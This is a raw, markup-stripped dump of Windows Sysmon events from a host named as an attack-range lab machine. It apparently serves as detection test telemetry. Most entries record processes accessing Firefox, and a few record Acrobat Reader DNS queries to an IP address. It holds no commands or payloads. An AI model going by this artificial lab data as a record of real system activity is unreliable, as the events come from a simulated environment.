Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000047850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.850{FE4C2B44-E64B-63C7-8806-00000000AF02}556045.139.105.143045.139.105.143;C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 22542200x800000000000000047849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.850{FE4C2B44-E64B-63C7-8806-00000000AF02}5560139.105.143123-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 22542200x800000000000000047848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.850{FE4C2B44-E64B-63C7-8806-00000000AF02}5560105.143123-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 10341000x800000000000000047847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.292{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000047846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.244{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FABCD42DB8719B790141296F01DC0299,SHA256=6D26342E94B5AC43461E60E6584E6BB823651727A4C4151FBEE4F8F2B6B07AA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.213{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.213{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.213{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.197{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 